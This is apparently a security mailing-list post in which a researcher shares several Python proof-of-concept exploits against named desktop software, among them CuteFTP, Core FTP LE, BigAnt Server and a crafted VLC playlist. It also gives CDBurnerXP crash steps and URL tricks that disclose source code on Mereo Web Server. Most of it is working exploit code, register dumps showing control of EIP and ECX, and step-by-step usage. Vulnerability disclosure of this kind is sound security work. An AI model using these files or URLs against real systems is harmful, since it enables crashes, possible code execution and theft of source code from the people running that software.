[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Multiple Vulnerabilities



Usually I submit via milw0rm but it has been unresponsive all week. 

Here are a few new vulnerabilities and updates.

-Dr_IDE
#!/usr/bin/env python

#####################################################################################################
#
# CuteFTP v8.3.3 Home/Pro/Lite Create New Site Local Buffer Overflow PoC
# Found By:	Dr_IDE
# Download: 	http://www.cuteftp.com/downloads/
# Tested On:	Windows 7 RC, XP might be more shell friendly
# Notes: 	This PoC exploits the "Create New Site" mechanism. Any site type that you pick will work.
# 		Because of differences in the internal process of each site type you may be able to get
#		execution through one of these channels.
#
#####################################################################################################

"""
EAX 02120000
ECX 0228BA90 ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
EDX 41414141
EBX 00004141
ESP 0018C160
EBP 0018C230
ESI 0228BA88
EDI 41414141
EIP 77843913 ntdll.77843913
C 0  ES 002B 32bit 0(FFFFFFFF)
P 0  CS 0023 32bit 0(FFFFFFFF)
A 1  SS 002B 32bit 0(FFFFFFFF)
Z 0  DS 002B 32bit 0(FFFFFFFF)
S 0  FS 0053 32bit 7EFDD000(FFF)
T 0  GS 002B 32bit 0(FFFFFFFF)
D 0
O 0  LastErr ERROR_SUCCESS (00000000)
EFL 00010212 (NO,NB,NE,A,NS,PO,GE,G)
ST0 empty -??? FFFF 000000FF 00FF00FF
ST1 empty -??? FFFF 00000000 00008200
ST2 empty -??? FFFF 00010000 00010000
ST3 empty 431.99999034404754640
ST4 empty 1.0000000000000000000
ST5 empty 1.0000000000000000000
ST6 empty 16.000000000000000000
ST7 empty 16.000000000000000000
               3 2 1 0      E S P U O Z D I
FST 4020  Cond 1 0 0 0  Err 0 0 1 0 0 0 0 0  (EQ)
FCW 027F  Prec NEAR,53  Mask    1 1 1 1 1 1

"""

buff = ("\x41" * 20000)

try:
	f1 = open("CuteFTP.txt","w");
	f1.write(buff);
	f1.close();

	print "\nCuteFTP v8.3.2 Home/Pro/Lite Create New Site Local Buffer Overflow PoC"
	print "By: Dr_IDE"
	print "\nFile Created Successfully.\n"
	print "Usage:\n [-] Click File\n [-] Create New FTP Site\n [-] Paste String into Label Field\n [-] Enter anything for Address\n [-] Click Connect\n [-] Boom."
except:
	print "[-] Error. File couldn't be created."
##########################################################################################################
#
# VLC Media Player 1.0.2 smb:// URI Handling Remote Stack Overflow PoC
# Found By:	Dr_IDE
# Tested:	Windows XP SP2 , XP SP3 and Windows 7 RC1 with VLC 1.0.2 "Goldeneye"
# Download:	http://majorgeeks.com/downloadget.php?id=4674&file=1&evp=a87d1b50269ba27878899d30ec7cd947
#
##########################################################################################################

# XPSP3 Crash 
"""
EAX FFFFFFFE
ECX 42424242        <--------- w00t!
EDX 00000000
EBX 42424242
ESP 02EAF694
EBP 02EAF7C4
ESI 61CC8324 libacc_4.61CC8324
EDI 61CC8323 libacc_4.61CC8323
EIP 77C478AC msvcrt.77C478AC
C 0  ES 0023 32bit 0(FFFFFFFF)
P 0  CS 001B 32bit 0(FFFFFFFF)
A 0  SS 0023 32bit 0(FFFFFFFF)
Z 0  DS 0023 32bit 0(FFFFFFFF)
S 0  FS 003B 32bit 7FFAC000(FFF)
T 0  GS 0000 NULL
D 0
O 0  LastErr ERROR_MOD_NOT_FOUND (0000007E)
EFL 00010202 (NO,NB,NE,A,NS,PO,GE,G)
ST0 empty -UNORM FB18 0184A1C0 00AD4518
ST1 empty +UNORM 2088 00000000 00000000
ST2 empty 0.3987488760738806780e-4933
ST3 empty -??? FFFF 00000000 77C2C42E
ST4 empty +UNORM 0B10 00B094E8 00000000
ST5 empty 0.3987486256431287370e-4933
ST6 empty 0.0
ST7 empty -0.2650710894356302916
               3 2 1 0      E S P U O Z D I
FST 0020  Cond 0 0 0 0  Err 0 0 1 0 0 0 0 0  (GT)
FCW 027F  Prec NEAR,53  Mask    1 1 1 1 1 1

"""
header1 =  ("<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n")
header1 += ("<playlist version=\"1\" xmlns=\"http://xspf.org/ns/0/\"; xmlns:vlc=\"http://www.videolan.org/vlc/playlist/ns/0/\";>\n")
header1 += ("\t<title>Playlist</title>\n")
header1 += ("\t<trackList>\n")
header1 += ("\t\t<track>\n")
header1 += ("\t\t\t<location>smb://example.com@xxxxxxxxxxxxxxx/foo/#{")

payload = ("\x41" * 2 + "\x42" * 4 + "\x43" * 10000)

header2 =  ("}</location>\n");
header2 += ("\t\t\t<extension application=\"http://www.videolan.org/vlc/playlist/0\";>\n");
header2 += ("\t\t\t\t<vlc:id>0</vlc:id>\n");
header2 += ("\t\t\t</extension>\n");
header2 += ("\t\t</track>\n");
header2 += ("\t</trackList>\n");
header2 += ("</playlist>\n");

try:
    f1 = open("vlc_1.0.2.xspf","w")
    f1.write(header1 + payload + header2)
    f1.close()
    print("\nExploit file created!\n")
except:
    print "Error"
#!/usr/bin/env python

####################################################################################
#
# Core FTP LE v2.1 build 1612 Local Buffer Overflow PoC (Unicode)
# Found By:	Dr_IDE
# Tested On:	XPSP3, 7RC
# Notes:	Most likely other versions are vulnerable too.
# Usage:	File, Quick Connect, Paste into Hostname, Connect
#
####################################################################################

# Register Dump on XPSP3
"""
EAX 00000064
ECX 00410041 coreftp.00410041
EDX 0054F840 coreftp.0054F840
EBX 026E2FFC
ESP 0321E958 UNICODE "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
EBP 00410041 coreftp.00410041
ESI 0269CC30
EDI 04BB6A58 UNICODE "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
EIP 00410041 coreftp.00410041
C 0  ES 002B 32bit 0(FFFFFFFF)
P 0  CS 0023 32bit 0(FFFFFFFF)
A 0  SS 002B 32bit 0(FFFFFFFF)
Z 0  DS 002B 32bit 0(FFFFFFFF)
S 0  FS 0053 32bit 7EFD7000(FFF)
T 0  GS 002B 32bit 0(FFFFFFFF)
D 0
O 0  LastErr WSAHOST_NOT_FOUND (00002AF9)
EFL 00010202 (NO,NB,NE,A,NS,PO,GE,G)
ST0 empty 0.0
ST1 empty 0.0
ST2 empty 0.0
ST3 empty 0.0
ST4 empty 0.0
ST5 empty 0.0
ST6 empty 0.0
ST7 empty 0.0
               3 2 1 0      E S P U O Z D I
FST 0000  Cond 0 0 0 0  Err 0 0 0 0 0 0 0 0  (GT)
FCW 027F  Prec NEAR,53  Mask    1 1 1 1 1 1
"""

# After Passing Exception on XPSP3
# EIP 00410041 coreftp.00410041

buff = ("\x41" * 6000)

f1 = open("coreftple.txt","w")
f1.write(buff)
f1.close()
#!/usr/bin/env python

####################################################################################
#
# CDBurnerXP v 4.2.4.1351 Local Crash PoC
# Found By:	Dr_IDE
# Tested On:	XPSP3, 7RC
# Usage:	Create New Data Disc, Add a Folder, Paste to Rename Folder, Click Save Compilation as ISO
# Notes:	Super lame and most likely not exploitable.
#
####################################################################################

'''
Error Message:
System.NullReferenceException: Object reference not set to an instance of an object.
   at CDBurnerXP.Controls.FileLayoutManager.SaveAsIso(String filename)
   at CDBurnerXP_Pro.frmDataCompilation.mnuSaveISO_Click(Object sender, EventArgs e)
   at System.Windows.Forms.MenuItem.OnClick(EventArgs e)
   at System.Windows.Forms.MenuItem.MenuItemData.Execute()
   at System.Windows.Forms.Command.Invoke()
   at System.Windows.Forms.Command.DispatchID(Int32 id)
   at System.Windows.Forms.Control.WmCommand(Message& m)
   at System.Windows.Forms.Control.WndProc(Message& m)
   at System.Windows.Forms.ScrollableControl.WndProc(Message& m)
   at System.Windows.Forms.ContainerControl.WndProc(Message& m)
   at System.Windows.Forms.Form.WndProc(Message& m)
   at CDBurnerXP.Forms.BaseForm.WndProc(Message& m)
   at CDBurnerXP_Pro.mdiMain.WndProc(Message& m)
   at System.Windows.Forms.Control.ControlNativeWindow.OnMessage(Message& m)
   at System.Windows.Forms.Control.ControlNativeWindow.WndProc(Message& m)
   at System.Windows.Forms.NativeWindow.Callback(IntPtr hWnd, Int32 msg, IntPtr wparam, IntPtr lparam)
'''

buff = ("\x41" * 5000)

f1 = open("cdburnerxp.txt","w")
f1.write(buff)
f1.close()

#!/usr/bin/env python

########################################################################
#
# BigAnt Server <= 2.50 SP6 Local (ZIP File) Buffer Overflow PoC #2
# Found By: 	Dr_IDE
# Tested:   	XPSP3
# Usage:	Open BigAnt Console, Go to Plug-In, Add our zip, Boom.
#
########################################################################

buff = ("\x41" * 10000)

f1 = open("BigAntPlugIn.zip","w")
f1.write(buff)
f1.close()
#!/usr/bin/env python

########################################################################
#
# BigAnt Server <= 2.50 SP6 Local (ZIP File) Buffer Overflow PoC #2
# Found By: 	Dr_IDE
# Tested:   	XPSP3
# Usage:	Open BigAnt Console, Go to Update, Add our zip, Boom.
#
########################################################################

buff = ("\x41" * 10000)

f1 = open("BigAntUpdate.zip","w")
f1.write(buff)
f1.close()
#################################################################################
#
# Mereo Web Server v1.8 Multiple Remote Source Code Disclosure
# Found By:		Dr_IDE
# Tested On:	Windows XPSP3
#
#################################################################################

- Description -

Mereo Web Server v1.8 is a Windows based HTTP server. This is the latest version of
the application available. 

Mereo is vulnerable to remote arbitrary source code disclosure by the following means.

- Technical Details -

	http://[ webserver IP]/[ file ][.]
	http://[ webserver IP]/[ file ][::$DATA]
	
	http://172.16.2.101/index.html.
	http://172.16.2.101/index.html::$DATA